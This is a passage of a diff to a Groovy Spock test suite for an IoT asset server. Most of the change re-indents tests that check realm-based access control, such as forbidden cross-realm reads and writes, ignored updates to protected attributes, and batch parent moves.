-        then: "a forbidden exception should be thrown"
-        thrown(ForbiddenException)
+    when: "the assets of the authenticated user are retrieved"
+    def assets = assetResource.getCurrentUserAssets(null)
 
-        when: "the root assets of the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(null))
-        )
+    then: "result should match"
+    assets.length == 6
+    Asset apartment1 = assets[0]
+    apartment1.id == managerTestSetup.apartment1Id
+    apartment1.name == "Apartment 1"
+    apartment1.createdOn.toEpochMilli() <System.currentTimeMillis()
+    apartment1.realm == keycloakTestSetup.realmBuilding.name
+    apartment1.type == BuildingAsset.DESCRIPTOR.getName()
+    apartment1.parentId == managerTestSetup.smartBuildingId
+    apartment1.path[0] == managerTestSetup.smartBuildingId
+    apartment1.path[1] == managerTestSetup.apartment1Id
+    apartment1.attributes.size() == 8
 
-        then: "result should match"
-        assets.length == 0
+    Asset apartment1Livingroom = assets[1]
+    apartment1Livingroom.id == managerTestSetup.apartment1LivingroomId
+    apartment1Livingroom.name == "Living Room 1"
 
-        when: "the root assets of a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .parents(new ParentPredicate(null))
-        )
+    Asset apartment1Kitchen = assets[2]
+    apartment1Kitchen.id == managerTestSetup.apartment1KitchenId
+    apartment1Kitchen.name == "Kitchen 1"
 
-        then: "a forbidden exception should be thrown"
-        thrown(ForbiddenException)
+    Asset apartment1Hallway = assets[3]
+    apartment1Hallway.id == managerTestSetup.apartment1HallwayId
+    apartment1Hallway.name == "Hallway 1"
 
-        when: "the child assets of linked asset are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(managerTestSetup.apartment1Id))
-        )
+    Asset apartment1Bedroom1 = assets[4]
+    apartment1Bedroom1.id == managerTestSetup.apartment1Bedroom1Id
+    apartment1Bedroom1.name == "Bedroom 1"
 
-        then: "result should match"
-        assets.length == 5
+    Asset apartment1Bathroom = assets[5]
+    apartment1Bathroom.id == managerTestSetup.apartment1BathroomId
+    apartment1Bathroom.name == "Bathroom 1"
 
-        when: "the child assets of an asset in the authenticated realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-        )
+    when: "the root assets of a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "result should match"
-        assets.length == 1
+    then: "a forbidden exception should be thrown"
+    thrown(ForbiddenException)
 
-        when: "the child assets of an asset in a foreign realm are retrieved"
-        assets = assetResource.queryAssets(null,
-                new AssetQuery()
-                        .parents(new ParentPredicate(managerTestSetup.thingId))
-        )
+    when: "the root assets of the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "result should be empty"
-        assets.length == 0
+    then: "result should match"
+    assets.length == 0
 
-        when: "an asset is retrieved by ID in the authenticated realm"
-        assetResource.get(null, managerTestSetup.smartBuildingId)
+    when: "the root assets of a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .parents(new ParentPredicate(null))
+            )
 
-        then: "access should be forbidden"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "a forbidden exception should be thrown"
+    thrown(ForbiddenException)
 
-        when: "a user asset is retrieved by ID in the authenticated realm"
-        apartment1Livingroom = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    when: "the child assets of linked asset are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(managerTestSetup.apartment1Id))
+            )
 
-        then: "the restricted asset details should be available"
-        apartment1Livingroom.id == managerTestSetup.apartment1LivingroomId
-        apartment1Livingroom.name == "Living Room 1"
-        def resultAttributes = apartment1Livingroom.getAttributes()
-        resultAttributes.size() == 8
-        def currentTemperatureAttr = apartment1Livingroom.getAttribute("currentTemperature").orElse(null)
-        currentTemperatureAttr.getType() == NUMBER
-        !currentTemperatureAttr.getValue().isPresent()
+    then: "result should match"
+    assets.length == 5
 
-        MetaMap resultMeta = currentTemperatureAttr.getMeta()
-        resultMeta.size() == 8
-        resultMeta.get(LABEL).flatMap {it.value}.orElse(null) == "Current temperature"
-        resultMeta.getValue(READ_ONLY).orElse(false)
-        resultMeta.has(AGENT_LINK)
-        resultMeta.getValue(ACCESS_RESTRICTED_READ).orElse(false)
-        resultMeta.getValue(UNITS).isPresent()
-        resultMeta.getValue(UNITS).get()[0] == UNITS_CELSIUS
+    when: "the child assets of an asset in the authenticated realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+            )
 
-        when: "an asset is retrieved by ID in a foreign realm"
-        assetResource.get(null, managerTestSetup.thingId)
+    then: "result should match"
+    assets.length == 1
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    when: "the child assets of an asset in a foreign realm are retrieved"
+    assets = assetResource.queryAssets(null,
+            new AssetQuery()
+            .parents(new ParentPredicate(managerTestSetup.thingId))
+            )
 
-        when: "all linked assets of the user are retrieved"
-        assets = assetResource.queryAssets(null, null)
+    then: "result should be empty"
+    assets.length == 0
 
-        then: "result should contain all linked assets"
-        assets.length == 6
+    when: "an asset is retrieved by ID in the authenticated realm"
+    assetResource.get(null, managerTestSetup.smartBuildingId)
 
-        /* ############################################## WRITE ####################################### */
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "an asset is created in a foreign realm"
-        def testAsset = new RoomAsset("Test Room")
+    when: "a user asset is retrieved by ID in the authenticated realm"
+    apartment1Livingroom = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+
+    then: "the restricted asset details should be available"
+    apartment1Livingroom.id == managerTestSetup.apartment1LivingroomId
+    apartment1Livingroom.name == "Living Room 1"
+    def resultAttributes = apartment1Livingroom.getAttributes()
+    resultAttributes.size() == 8
+    def currentTemperatureAttr = apartment1Livingroom.getAttribute("currentTemperature").orElse(null)
+    currentTemperatureAttr.getType() == NUMBER
+    !currentTemperatureAttr.getValue().isPresent()
+
+    MetaMap resultMeta = currentTemperatureAttr.getMeta()
+    resultMeta.size() == 8
+    resultMeta.get(LABEL).flatMap {it.value}.orElse(null) == "Current temperature"
+    resultMeta.getValue(READ_ONLY).orElse(false)
+    resultMeta.has(AGENT_LINK)
+    resultMeta.getValue(ACCESS_RESTRICTED_READ).orElse(false)
+    resultMeta.getValue(UNITS).isPresent()
+    resultMeta.getValue(UNITS).get()[0] == UNITS_CELSIUS
+
+    when: "an asset is retrieved by ID in a foreign realm"
+    assetResource.get(null, managerTestSetup.thingId)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "all linked assets of the user are retrieved"
+    assets = assetResource.queryAssets(null, null)
+
+    then: "result should contain all linked assets"
+    assets.length == 6
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "an asset is created in a foreign realm"
+    def testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmMaster.name)
-        assetResource.create(null, testAsset)
+    assetResource.create(null, testAsset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
 
-        when: "an asset is made a root asset in the authenticated realm"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
-        testAsset.setParentId(null)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    when: "an asset is made a root asset in the authenticated realm"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    testAsset.setParentId(null)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
 
-        then: "the update should be ignored"
-        assert testAsset.getParentId() == managerTestSetup.apartment1Id
+    then: "the update should be ignored"
+    assert testAsset.getParentId() == managerTestSetup.apartment1Id
 
-        when: "an asset is moved to a new parent in the authenticated realm"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
-        testAsset.setParentId(managerTestSetup.apartment2Id)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    when: "an asset is moved to a new parent in the authenticated realm"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    testAsset.setParentId(managerTestSetup.apartment2Id)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
 
-        then: "the update should be ignored"
-        assert testAsset.getParentId() == managerTestSetup.apartment1Id
+    then: "the update should be ignored"
+    assert testAsset.getParentId() == managerTestSetup.apartment1Id
 
-        when: "an asset is made private"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
-        testAsset.setAccessPublicRead(false)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    when: "an asset is made private"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    testAsset.setAccessPublicRead(false)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
 
-        then: "the update should be ignored"
-        assert testAsset.isAccessPublicRead()
+    then: "the update should be ignored"
+    assert testAsset.isAccessPublicRead()
 
-        when: "an asset is renamed"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
-        testAsset.setName("Ignored")
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    when: "an asset is renamed"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
+    testAsset.setName("Ignored")
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1LivingroomId)
 
-        then: "the update should be ignored"
-        assert testAsset.getName() == "Living Room 1"
+    then: "the update should be ignored"
+    assert testAsset.getName() == "Living Room 1"
 
-        when: "an asset is created in the authenticated realm"
-        testAsset = new RoomAsset("Test Room")
+    when: "an asset is created in the authenticated realm"
+    testAsset = new RoomAsset("Test Room")
             .setRealm(keycloakTestSetup.realmBuilding.name)
-        assetResource.create(null, testAsset)
+    assetResource.create(null, testAsset)
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted in the authenticated realm"
-        assetResource.delete(null, [managerTestSetup.apartment1LivingroomId])
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset is deleted in a foreign realm"
-        assetResource.delete(null, [managerTestSetup.thingId])
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a private asset attribute is written on a user asset"
-        assetResource.writeAttributeValue(null, managerTestSetup.apartment1LivingroomId, "lightSwitch", false)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an attribute is written on a non-existent user asset"
-        assetResource.writeAttributeValue(null, "doesnotexist", "lightSwitch", false)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an non-existent attribute is written on a user asset"
-        assetResource.writeAttributeValue(null, managerTestSetup.apartment1LivingroomId, "doesnotexist", '"foo"')
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset attribute is written on a non-user asset"
-        assetResource.writeAttributeValue(null, managerTestSetup.apartment3LivingroomId, "lightSwitch", false)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "an asset attribute is written in a foreign realm"
-        assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a non-writable attribute value is written on a user asset"
-        assetResource.writeAttributeValue(null, managerTestSetup.apartment1KitchenId, "presenceDetected", true)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when: "a non-writable attribute value is updated on a user asset"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-        testAsset.getAttribute("presenceDetected").get().setValue(true)
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-
-        then: "the update should be ignored"
-        assert !testAsset.getAttribute("presenceDetected").get().getValue().isPresent()
-
-        when: "a non-writable attribute is updated on a user asset"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-        testAsset.addOrReplaceAttributes(new Attribute<>("presenceDetected", BOOLEAN, true))
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-
-        then: "the update should be ignored"
-        assert !testAsset.getAttribute("presenceDetected").get().getValue().isPresent()
-
-        when: "a new attribute is added on a user asset"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-        testAsset.addAttributes(new Attribute<>("myCustomAttribute", NUMBER, 123d).addMeta(new MetaItem<>(LABEL, "Label")))
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-
-        then: "result should match"
-        assert testAsset.getAttribute("myCustomAttribute").get().getValue().get() == 123
-
-        when: "a writable attribute value is written on a user asset"
-        assetResource.writeAttributeValue(null, managerTestSetup.apartment1KitchenId, "myCustomAttribute", 456)
-
-        then: "result should match"
-        conditions.eventually {
-            testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId) as RoomAsset
-            assert testAsset.getAttribute("myCustomAttribute").get().getValue().get() == 456
-        }
-
-        when: "a writable attribute has a meta item value update"
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-        testAsset.getAttribute("myCustomAttribute").get().getMetaItem(LABEL).get().setValue("My label update")
-        assetResource.update(null, testAsset.id, testAsset)
-        testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
-
-        then: "the result should match"
-        assert testAsset.getAttribute("myCustomAttribute").get().getMetaItem(LABEL).get().getValue().get() == "My label update"
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates within the authenticated realm succeed for testuser1"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is deleted in the authenticated realm"
+    assetResource.delete(null, [managerTestSetup.apartment1LivingroomId])
 
-        and: "an authenticated test user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        and: "there are assets in the authenticated realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
-        def asset2 = assetResource.create(null, new RoomAsset("Batch Asset 2").setRealm(keycloakTestSetup.realmMaster.name))
-
-        when: "assets in the authenticated realm are moved under an authenticated parent"
-        assetResource.updateParent(null, managerTestSetup.groundFloorId, [asset1.id, asset2.id])
-
-        then: "the assets should be moved"
-        (assetResource.get(null, asset1.id) as RoomAsset).parentId == managerTestSetup.groundFloorId
-        (assetResource.get(null, asset2.id) as RoomAsset).parentId == managerTestSetup.groundFloorId
-
-        when: "the parent is cleared for assets in the authenticated realm"
-        assetResource.updateNoneParent(null, [asset1.id, asset2.id])
-
-        then: "the assets should become root assets again"
-        (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
-        (assetResource.get(null, asset2.id) as RoomAsset).parentId == null
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent clear across accessible realms succeeds for superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset is deleted in a foreign realm"
+    assetResource.delete(null, [managerTestSetup.thingId])
 
-        and: "an authenticated admin user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
-
-        and: "there are child assets with parents in different accessible realms"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def masterAsset = assetResource.create(null, new RoomAsset("Master batch clear").setRealm(keycloakTestSetup.realmMaster.name).setParentId(managerTestSetup.groundFloorId))
-        def buildingAsset = assetResource.create(null, new RoomAsset("Building batch clear").setRealm(keycloakTestSetup.realmBuilding.name).setParentId(managerTestSetup.smartBuildingId))
-
-        when: "the superuser clears the parent of both assets in one request"
-        assetResource.updateNoneParent(null, [masterAsset.id, buildingAsset.id])
-
-        then: "both assets should become root assets"
-        (assetResource.get(null, masterAsset.id) as RoomAsset).parentId == null
-        (assetResource.get(null, buildingAsset.id) as RoomAsset).parentId == null
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject foreign child assets for testuser1"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "a private asset attribute is written on a user asset"
+    assetResource.writeAttributeValue(null, managerTestSetup.apartment1LivingroomId, "lightSwitch", false)
 
-        and: "an authenticated test user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        and: "there is an asset in the authenticated realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
-
-        when: "a parent update is requested with an asset from a foreign realm"
-        assetResource.updateParent(null, managerTestSetup.groundFloorId, [asset1.id, managerTestSetup.apartment2LivingroomId])
-
-        then: "the request should be forbidden and no asset should be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 403
-        (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates reject foreign parents for testuser1"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an attribute is written on a non-existent user asset"
+    assetResource.writeAttributeValue(null, "doesnotexist", "lightSwitch", false)
 
-        and: "an authenticated test user will make the call"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser1",
-                "testuser1"
-        )
-
-        and: "there's an asset in the authenticated realm"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
-        def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
-
-        when: "a parent update is requested with the target parent in a foreign realm"
-        assetResource.updateParent(null, managerTestSetup.smartBuildingId, [asset1.id])
-
-        then: "the request should be forbidden and no asset should be moved"
-        WebApplicationException ex = thrown()
-        ex.response.status == 403
-        (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent updates are forbidden for restricted testuser3"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an non-existent attribute is written on a user asset"
+    assetResource.writeAttributeValue(null, managerTestSetup.apartment1LivingroomId, "doesnotexist", '"foo"')
 
-        and: "an authenticated restricted user will make the call"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-
-        when: "a restricted user tries to move a linked asset"
-        def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
-        assetResource.updateParent(null, managerTestSetup.apartment2Id, [managerTestSetup.apartment1LivingroomId])
-
-        then: "the request should be forbidden and the parent should remain unchanged"
-        WebApplicationException ex = thrown()
-        ex.response.status == 403
-        (assetResource.get(null, managerTestSetup.apartment1LivingroomId) as RoomAsset).parentId == managerTestSetup.apartment1Id
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Batch parent clear is forbidden for restricted testuser3"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset attribute is written on a non-user asset"
+    assetResource.writeAttributeValue(null, managerTestSetup.apartment3LivingroomId, "lightSwitch", false)
 
-        and: "an authenticated restricted user will make the call"
-        def accessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
-
-        when: "a restricted user tries to clear the parent of a linked asset"
-        def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
-        assetResource.updateNoneParent(null, [managerTestSetup.apartment1LivingroomId])
-
-        then: "the request should be forbidden and the parent should remain unchanged"
-        WebApplicationException ex = thrown()
-        ex.response.status == 403
-        (assetResource.get(null, managerTestSetup.apartment1LivingroomId) as RoomAsset).parentId == managerTestSetup.apartment1Id
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "Access assets as anonymous user"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    when: "an asset attribute is written in a foreign realm"
+    assetResource.writeAttributeValue(null, managerTestSetup.smartOfficeId, BuildingAsset.STREET.name, '"Teststreet 123"')
 
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(AssetResource.class)
-
-        when: "the anonymous user tries to retrieve all assets"
-        def assets = assetResource.queryAssets(null, new AssetQuery().recursive(true))
-
-        then: "only public assets should be returned"
-        assets.size() == 3
-        assets.find {it.id == managerTestSetup.apartment1Id } != null
-        assets.find {it.id == managerTestSetup.apartment1LivingroomId } != null
-        assets.find {it.id == managerTestSetup.apartment2LivingroomId } != null
-
-        when: "the public assets are retrieved"
-        assets = assetResource.queryAssets(null, new AssetQuery()
-                .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name)))
-
-        then: "the public assets should be retrieved"
-        assert assets.size() == 3
-        assert assets.find {it.id == managerTestSetup.apartment1Id} != null
-        assert assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
-        assert assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
-
-        when: "the public assets are retrieved without a query"
-        assets = assetResource.queryAssets(null, null)
-
-        then: "the public assets should be retrieved"
-        assert assets.size() == 3
-        assert assets.find {it.id == managerTestSetup.apartment1Id} != null
-        assert assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
-        assert assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
-
-        when: "an attribute with public write is written to and another with only public read"
-        def writeResults = assetResource.writeAttributeValues(null, [
-            new AttributeState(managerTestSetup.apartment1Id, Asset.LOCATION.name, null),
-            new AttributeState(managerTestSetup.apartment2LivingroomId, Asset.LOCATION.name, null)
-        ] as AttributeState[])
-
-        then: "the request should have succeeded but only the apartment1 location event should have been successful"
-        assert writeResults.size() == 2
-        assert writeResults.find {it.ref.id == managerTestSetup.apartment1Id && it.ref.name == Asset.LOCATION.name}.failure == null
-        assert writeResults.find {it.ref.id == managerTestSetup.apartment2LivingroomId && it.ref.name == Asset.LOCATION.name}.failure == AttributeWriteFailure.INSUFFICIENT_ACCESS
-
-        when: "an attribute with public write=false is written to anonymously"
-        def result = assetResource.writeAttributeValue(null, managerTestSetup.apartment1Id, BuildingAsset.STREET.name, '"Should fail"')
-
-        then: "the request should fail with an exception"
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-           assert r.status == 403
-           return true
-        }
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
+
+    when: "a non-writable attribute value is written on a user asset"
+    assetResource.writeAttributeValue(null, managerTestSetup.apartment1KitchenId, "presenceDetected", true)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "a non-writable attribute value is updated on a user asset"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+    testAsset.getAttribute("presenceDetected").get().setValue(true)
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+
+    then: "the update should be ignored"
+    assert !testAsset.getAttribute("presenceDetected").get().getValue().isPresent()
+
+    when: "a non-writable attribute is updated on a user asset"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+    testAsset.addOrReplaceAttributes(new Attribute<>("presenceDetected", BOOLEAN, true))
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+
+    then: "the update should be ignored"
+    assert !testAsset.getAttribute("presenceDetected").get().getValue().isPresent()
+
+    when: "a new attribute is added on a user asset"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+    testAsset.addAttributes(new Attribute<>("myCustomAttribute", NUMBER, 123d).addMeta(new MetaItem<>(LABEL, "Label")))
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+
+    then: "result should match"
+    assert testAsset.getAttribute("myCustomAttribute").get().getValue().get() == 123
+
+    when: "a writable attribute value is written on a user asset"
+    assetResource.writeAttributeValue(null, managerTestSetup.apartment1KitchenId, "myCustomAttribute", 456)
+
+    then: "result should match"
+    conditions.eventually {
+      testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId) as RoomAsset
+      assert testAsset.getAttribute("myCustomAttribute").get().getValue().get() == 456
+    }
+
+    when: "a writable attribute has a meta item value update"
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+    testAsset.getAttribute("myCustomAttribute").get().getMetaItem(LABEL).get().setValue("My label update")
+    assetResource.update(null, testAsset.id, testAsset)
+    testAsset = assetResource.get(null, managerTestSetup.apartment1KitchenId)
+
+    then: "the result should match"
+    assert testAsset.getAttribute("myCustomAttribute").get().getMetaItem(LABEL).get().getValue().get() == "My label update"
+  }
+
+  def "Batch parent updates within the authenticated realm succeed for testuser1"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated test user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+
+    and: "there are assets in the authenticated realm"
